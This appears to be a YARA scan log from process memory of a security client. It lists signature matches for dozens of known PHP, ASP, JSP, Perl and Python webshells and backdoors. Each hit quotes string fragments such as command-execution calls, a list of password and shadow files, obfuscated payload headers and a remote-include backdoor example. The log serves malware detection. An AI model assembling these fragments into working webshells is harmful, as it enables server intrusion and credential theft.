- 0x33e14f:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x350e36:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x3534f7:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2f926c:$s2: print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><
- 0x353544:$s2: print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | s72_Shell_v1_1_Coding_html | Semi-Auto-generated - file s72 Shell v1.1 Coding.html.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f93d1:$s0: Dizin</font></b></font><font face="Verdana" style="font-size: 8pt"><
- 0x353655:$s0: Dizin</font></b></font><font face="Verdana" style="font-size: 8pt"><
- 0x2f9422:$s1: s72 Shell v1.0 Codinf by Cr@zy_King
- 0x35369c:$s1: s72 Shell v1.0 Codinf by Cr@zy_King
- 0x2f9452:$s3: echo "<p align=center>Dosya Zaten Bulunuyor</p>"
- 0x3536c2:$s3: echo "<p align=center>Dosya Zaten Bulunuyor</p>"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hidshell_php_php | Semi-Auto-generated - file hidshell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f9586:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
- 0x307cbd:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
- 0x3537a2:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
- 0x35e1ce:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | kacak_asp | Semi-Auto-generated - file kacak.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f96cc:$s0: Kacak FSO 1.0
- 0x353894:$s0: Kacak FSO 1.0
- 0x2f96e6:$s1: if request.querystring("TGH") = "1" then
- 0x3538a4:$s1: if request.querystring("TGH") = "1" then
- 0x2f971b:$s3: <font color="#858585">BuqX</font></a></font><font face="Verdana" style=
- 0x3538cf:$s3: <font color="#858585">BuqX</font></a></font><font face="Verdana" style=
- 0x2f976f:$s4: mailto:BuqX@hotmail.com
- 0x353919:$s4: mailto:BuqX@hotmail.com
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PHP_Backdoor_Connect_pl_php | Semi-Auto-generated - file PHP Backdoor Connect.pl.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f98a0:$s0: LorD of IRAN HACKERS SABOTAGE
- 0x3539f6:$s0: LorD of IRAN HACKERS SABOTAGE
- 0x2f98ca:$s1: LorD-C0d3r-NT
- 0x353a16:$s1: LorD-C0d3r-NT
- 0x2f87cd:$s2: echo --==Userinfo==-- ;
- 0x2f98e4:$s2: echo --==Userinfo==-- ;
- 0x352d0b:$s2: echo --==Userinfo==-- ;
- 0x353a26:$s2: echo --==Userinfo==-- ;
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Antichat_Socks5_Server_php_php | Semi-Auto-generated - file Antichat Socks5 Server.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f9a1b:$s0: $port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);
- 0x2f9a78:$s3: # [+] Domain name address type
- 0x353b5c:$s3: # [+] Domain name address type
- 0x2f9aa5:$s4: www.antichat.ru
- 0x353b7f:$s4: www.antichat.ru
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Antichat_Shell_v1_3_php | Semi-Auto-generated - file Antichat Shell v1.3.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2df062:$s0: Antichat
- 0x2df0ad:$s0: Antichat
- 0x2df1d9:$s0: Antichat
- 0x2f9908:$s0: Antichat
- 0x2f9967:$s0: Antichat
- 0x2f9ac1:$s0: Antichat
- 0x2f9b19:$s0: Antichat
- 0x2f9bc6:$s0: Antichat
- 0x341451:$s0: Antichat
- 0x341482:$s0: Antichat
- 0x341551:$s0: Antichat
- 0x353a3d:$s0: Antichat
- 0x353a82:$s0: Antichat
- 0x353b8e:$s0: Antichat
- 0x353bcc:$s0: Antichat
- 0x353c4c:$s0: Antichat
- 0x2f9bdb:$s1: Can't open file, permission denide
- 0x353c57:$s1: Can't open file, permission denide
- 0x2f5f9c:$s2: $ra44
- 0x2f5fbf:$s2: $ra44
- 0x2f9c0a:$s2: $ra44
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php | Semi-Auto-generated - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2d54d3:$s0: Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy
- 0x2f9d4b:$s0: Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy
- 0x33aadc:$s0: Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy
- 0x353d69:$s0: Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy
- 0x2d5526:$s1: Mode Shell v1.0</font></span>
- 0x2f9d9c:$s1: Mode Shell v1.0</font></span>
- 0x33ab25:$s1: Mode Shell v1.0</font></span>
- 0x353db0:$s1: Mode Shell v1.0</font></span>
- 0x2f9dc6:$s2: has been already loaded. PHP Emperor <xb5@hotmail.
- 0x3067e3:$s2: has been already loaded. PHP Emperor <xb5@hotmail.
- 0x353dd0:$s2: has been already loaded. PHP Emperor <xb5@hotmail.
- 0x35d1c1:$s2: has been already loaded. PHP Emperor <xb5@hotmail.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | mysql_php_php | Semi-Auto-generated - file mysql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f9ef6:$s0: action=mysqlread&mass=loadmass">load all defaults
- 0x353eac:$s0: action=mysqlread&mass=loadmass">load all defaults
- 0x2f9f34:$s2: if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru
- 0x353ee0:$s2: if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru
- 0x2f5f9c:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x2f9f85:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x2fb6b4:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x30db2b:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x350ed6:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x353f27:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x3550b0:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x362922:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Worse_Linux_Shell_php | Semi-Auto-generated - file Worse Linux Shell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fa0d1:$s1: print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td
- 0x35401f:$s1: print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td
- 0x2fa12b:$s2: print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd
- 0x35406f:$s2: print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | cyberlords_sql_php_php | Semi-Auto-generated - file cyberlords_sql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fa285:$s0: Coded by n0 [nZer0]
- 0x354175:$s0: Coded by n0 [nZer0]
- 0x2fa2a5:$s1: www.cyberlords.net
- 0x35418b:$s1: www.cyberlords.net
- 0x2fa2c5:$s2: U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE
- 0x3541a1:$s2: U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE
- 0x2fa31e:$s3: return "<BR>Dump error! Can't write to ".htmlspecialchars($file);
- 0x3541f0:$s3: return "<BR>Dump error! Can't write to ".htmlspecialchars($file);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | cmd_asp_5_1_asp | Semi-Auto-generated - file cmd-asp-5.1.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fa461:$s0: Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
- 0x2d946d:$s3: Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
- 0x2fa4a1:$s3: Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | pws_php_php | Semi-Auto-generated - file pws.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fa5d7:$s0: <div align="left"><font size="1">Input command :</font></div>
- 0x2fa621:$s1: <input type="text" name="cmd" size="30" class="input"><br>
- 0x2fa668:$s4: <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>
- 0x354474:$s4: <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PHP_Shell_php_php | Semi-Auto-generated - file PHP Shell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2dca19:$s0: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x2fa7b3:$s0: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x33fa69:$s0: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x35456b:$s0: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x2df006:$s1: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
- 0x2fa807:$s1: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
- 0x341402:$s1: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
- 0x3545b5:$s1: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html | Semi-Auto-generated - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fa85a:$s0: Ayyildiz
- 0x2fa8c3:$s0: Ayyildiz
- 0x2fa981:$s0: Ayyildiz
- 0x30be37:$s0: Ayyildiz
- 0x30bea3:$s0: Ayyildiz
- 0x325ac6:$s0: Ayyildiz
- 0x3545fb:$s0: Ayyildiz
- 0x35464a:$s0: Ayyildiz
- 0x3546db:$s0: Ayyildiz
- 0x36133b:$s0: Ayyildiz
- 0x36138d:$s0: Ayyildiz
- 0x373656:$s0: Ayyildiz
- 0x2fa996:$s1: TouCh By iJOo
- 0x30bfa7:$s1: TouCh By iJOo
- 0x3546e6:$s1: TouCh By iJOo
- 0x36144a:$s1: TouCh By iJOo
- 0x2fa9b0:$s2: First we check if there has been asked for a working directory
- 0x3546f6:$s2: First we check if there has been asked for a working directory
- 0x2fa9fb:$s3: http://ayyildiz.org/images/whosonline2.gif
- 0x354737:$s3: http://ayyildiz.org/images/whosonline2.gif
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | EFSO_2_asp | Semi-Auto-generated - file EFSO_2.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fab1d:$s0: Ejder was HERE
- 0x354805:$s0: Ejder was HERE
- 0x2fab38:$s1: *~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~
- 0x354816:$s1: *~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | lamashell_php | Semi-Auto-generated - file lamashell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fac86:$s0: lama's'hell
- 0x309619:$s0: lama's'hell
- 0x35f4c8:$s0: lama's'hell
- 0x2fac9e:$s1: if($_POST['king'] == "") {
- 0x35491e:$s1: if($_POST['king'] == "") {
- 0x2facc5:$s2: if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['f
- 0x35493b:$s2: if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['f
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Ajax_PHP_Command_Shell_php | Semi-Auto-generated - file Ajax_PHP Command Shell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fae27:$s1: newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>
- 0x354a49:$s1: newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>
- 0x2fae84:$s2: Empty Command..type \"shellhelp\" for some ehh...help
- 0x354a9c:$s2: Empty Command..type \"shellhelp\" for some ehh...help
- 0x2faec6:$s3: newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct
- 0x354ad4:$s3: newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JspWebshell_1_2_jsp | Semi-Auto-generated - file JspWebshell 1.2.jsp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2ea0c3:$s0: JspWebshell
- 0x2ea131:$s0: JspWebshell
- 0x2faf23:$s0: JspWebshell
- 0x2faf77:$s0: JspWebshell
- 0x2fb020:$s0: JspWebshell
- 0x3081bd:$s0: JspWebshell
- 0x308215:$s0: JspWebshell
- 0x30c512:$s0: JspWebshell
- 0x30c56c:$s0: JspWebshell
- 0x34893b:$s0: JspWebshell
- 0x34898f:$s0: JspWebshell
- 0x354b24:$s0: JspWebshell
- 0x354b5e:$s0: JspWebshell
- 0x354bda:$s0: JspWebshell
- 0x35e598:$s0: JspWebshell
- 0x35e5d6:$s0: JspWebshell
- 0x36186f:$s0: JspWebshell
- 0x3618af:$s0: JspWebshell
- 0x2fb038:$s1: CreateAndDeleteFolder is error:
- 0x3082fa:$s1: CreateAndDeleteFolder is error:
- 0x30c651:$s1: CreateAndDeleteFolder is error:
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Sincap_php_php | Semi-Auto-generated - file Sincap.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fb1c8:$s0: $baglan=fopen("/tmp/$ekinci",'r');
- 0x354d10:$s0: $baglan=fopen("/tmp/$ekinci",'r');
- 0x2fb1f7:$s2: $tampon4=$tampon3-1
- 0x354d35:$s2: $tampon4=$tampon3-1
- 0x2fb217:$s3: @aventgrup.net
- 0x3055a6:$s3: @aventgrup.net
- 0x354d4b:$s3: @aventgrup.net
- 0x35c3d5:$s3: @aventgrup.net
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Test_php_php | Semi-Auto-generated - file Test.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fb321:$s0: $yazi = "test" . "\r\n";
- 0x31bd41:$s0: $yazi = "test" . "\r\n";
- 0x2fb346:$s2: fwrite ($fp, "$yazi");
- 0x31bd66:$s2: fwrite ($fp, "$yazi");
- 0x2fb369:$s3: $entry_line="HACKed by EntriKa";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Phyton_Shell_py | Semi-Auto-generated - file Phyton Shell.py.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fb48b:$s1: sh_out=os.popen(SHELL+" "+cmd).readlines()
- 0x2fb4c2:$s2: # d00r.py 0.3a (reverse|bind)-shell in python by fQ
- 0x2fb504:$s3: print "error; help: head -n 16 d00r.py"
- 0x2fb538:$s4: print "PW:",PW,"PORT:",PORT,"HOST:",HOST
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | mysql_tool_php_php | Semi-Auto-generated - file mysql_tool.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fb668:$s0: $error_text = '<strong>Failed selecting database "'.$this->db['
- 0x35506e:$s0: $error_text = '<strong>Failed selecting database "'.$this->db['
- 0x2f5f9c:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x2fb6b4:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x30db2b:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x350ed6:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x3550b0:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x362922:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x2fb705:$s4: <div align="center">The backup process has now started<br
- 0x3550f7:$s4: <div align="center">The backup process has now started<br
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Zehir_4_asp | Semi-Auto-generated - file Zehir 4.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fb839:$s2: </a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time=
- 0x3551d7:$s2: </a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time=
- 0x2fb890:$s4: <input type=submit value="Test Et!" onclick="
- 0x355224:$s4: <input type=submit value="Test Et!" onclick="
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | sh_php_php | Semi-Auto-generated - file sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fb9b5:$s1: $ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e
- 0x3552f5:$s1: $ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e
- 0x2fba12:$s2: Show <input type=text size=5 value=".((isset($_POST['br_st']))?$_POST['br_st']:
- 0x355348:$s2: Show <input type=text size=5 value=".((isset($_POST['br_st']))?$_POST['br_st']:
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | phpbackdoor15_php | Semi-Auto-generated - file phpbackdoor15.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fbb67:$s1: echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["na
- 0x355449:$s1: echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["na
- 0x2fbbb5:$s2: if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FI
- 0x35548d:$s2: if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FI
- 0x2fbc06:$s3: echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s
- 0x3554d4:$s3: echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | phpjackal_php | Semi-Auto-generated - file phpjackal.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fbd51:$s3: $dl=$_REQUEST['downloaD'];
- 0x3555cb:$s3: $dl=$_REQUEST['downloaD'];
- 0x2fbd78:$s4: else shelL("perl.exe $name $port");
- 0x3555e8:$s4: else shelL("perl.exe $name $port");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | sql_php_php | Semi-Auto-generated - file sql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fbe95:$s1: fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#
- 0x3556b1:$s1: fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#
- 0x2f4fbf:$s2: http://rst.void.ru
- 0x2fbec4:$s2: http://rst.void.ru
- 0x2fbee8:$s2: http://rst.void.ru
- 0x3502e1:$s2: http://rst.void.ru
- 0x3556e0:$s2: http://rst.void.ru
- 0x3556fa:$s2: http://rst.void.ru
- 0x2d4d20:$s3: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
- 0x2fbf07:$s3: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
- 0x33a561:$s3: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
- 0x35570f:$s3: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | cgi_python_py | Semi-Auto-generated - file cgi-python.py.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fc04a:$s0: a CGI by Fuzzyman
- 0x3557fe:$s0: a CGI by Fuzzyman
- 0x2fc068:$s1: """+fontline +"Version : " + versionstring + """, Running on : """ +
- 0x355812:$s1: """+fontline +"Version : " + versionstring + """, Running on : """ +
- 0x2fc0ba:$s2: values = map(lambda x: x.value, theform[field]) # allows for
- 0x35585a:$s2: values = map(lambda x: x.value, theform[field]) # allows for
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ru24_post_sh_php_php | Semi-Auto-generated - file ru24_post_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fc206:$s1: <title>Ru24PostWebShell - ".$_POST['cmd']."</title>
- 0x2fc246:$s3: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x307abe:$s3: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x355988:$s3: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x35e05b:$s3: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x2fc2a0:$s4: Writed by DreAmeRz
- 0x307b35:$s4: Writed by DreAmeRz
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | DTool_Pro_php | Semi-Auto-generated - file DTool Pro.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fc3b0:$s0: r3v3ng4ns\nDigite
- 0x304afd:$s0: r3v3ng4ns\nDigite
- 0x355a94:$s0: r3v3ng4ns\nDigite
- 0x35bbf5:$s0: r3v3ng4ns\nDigite
- 0x2fc3ce:$s1: if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permissi
- 0x355aa8:$s1: if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permissi
- 0x2fc42a:$s3: if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n
- 0x355afa:$s3: if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | telnetd_pl | Semi-Auto-generated - file telnetd.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fc56c:$s0: 0ldW0lf
- 0x2fc580:$s1: However you are lucky :P
- 0x355bf2:$s1: However you are lucky :P
- 0x2fc5a5:$s2: I'm FuCKeD
- 0x355c0d:$s2: I'm FuCKeD
- 0x2fc5bc:$s3: ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#
- 0x355c1a:$s3: ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#
- 0x2fc602:$s4: atrix@irc.brasnet.org
- 0x355c56:$s4: atrix@irc.brasnet.org
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | php_include_w_shell_php | Semi-Auto-generated - file php-include-w-shell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fc729:$s0: $dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd
- 0x355d29:$s0: $dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd
- 0x2fc785:$s1: if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB
- 0x355d7b:$s1: if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fc7e2:$s0: Safe0ver
- 0x2fc853:$s0: Safe0ver
- 0x2fc919:$s0: Safe0ver
- 0x355e22:$s0: Safe0ver
- 0x2fc92e:$s1: Script Gecisi Tamamlayamadi!
- 0x355ec6:$s1: Script Gecisi Tamamlayamadi!
- 0x2fc957:$s2: document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%
- 0x355ee5:$s2: document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shell_php_php | Semi-Auto-generated - file shell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fcaa5:$s1: /* We have found the parent dir. We must be carefull if the parent
- 0x2fcaf5:$s2: $tmpfile = tempnam('/tmp', 'phpshell');
- 0x356025:$s2: $tmpfile = tempnam('/tmp', 'phpshell');
- 0x2fcb29:$s3: if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | telnet_cgi | Semi-Auto-generated - file telnet.cgi.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x308c85:$s0: www.rohitab.com
- 0x35edad:$s0: www.rohitab.com
- 0x2f597c:$s1: W A R N I N G: Private Server
- 0x2fcc64:$s1: W A R N I N G: Private Server
- 0x350a56:$s1: W A R N I N G: Private Server
- 0x356136:$s1: W A R N I N G: Private Server
- 0x2fcc8e:$s2: print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
- 0x356156:$s2: print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
- 0x2fccd5:$s3: $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $C
- 0x356193:$s3: $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $C
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ironshell_php | Semi-Auto-generated - file ironshell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fce0f:$s0: www.ironwarez.info
- 0x356279:$s0: www.ironwarez.info
- 0x2fce2e:$s1: $cookiename = "wieeeee";
- 0x35628e:$s1: $cookiename = "wieeeee";
- 0x2fce53:$s2: ~ Shell I
- 0x304c90:$s2: ~ Shell I
- 0x3562a9:$s2: ~ Shell I
- 0x35bd11:$s2: ~ Shell I
- 0x2fce69:$s3: www.rootshell-team.info
- 0x3562b5:$s3: www.rootshell-team.info
- 0x2fce8d:$s4: setcookie($cookiename, $_POST['pass'], time()+3600);
- 0x3562cf:$s4: setcookie($cookiename, $_POST['pass'], time()+3600);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | backdoorfr_php | Semi-Auto-generated - file backdoorfr.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fcfc1:$s1: www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan
- 0x3563af:$s1: www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan
- 0x2fd01e:$s2: print("<br>Provenance du mail : <input type=\"text\" name=\"provenanc
- 0x356402:$s2: print("<br>Provenance du mail : <input type=\"text\" name=\"provenanc
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | aspydrv_asp | Semi-Auto-generated - file aspydrv.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fd16f:$s0: If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
- 0x3564f2:$s0: If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
- 0x1883:$s1: password
- 0x18ad:$s1: password
- 0xb267:$s1: password
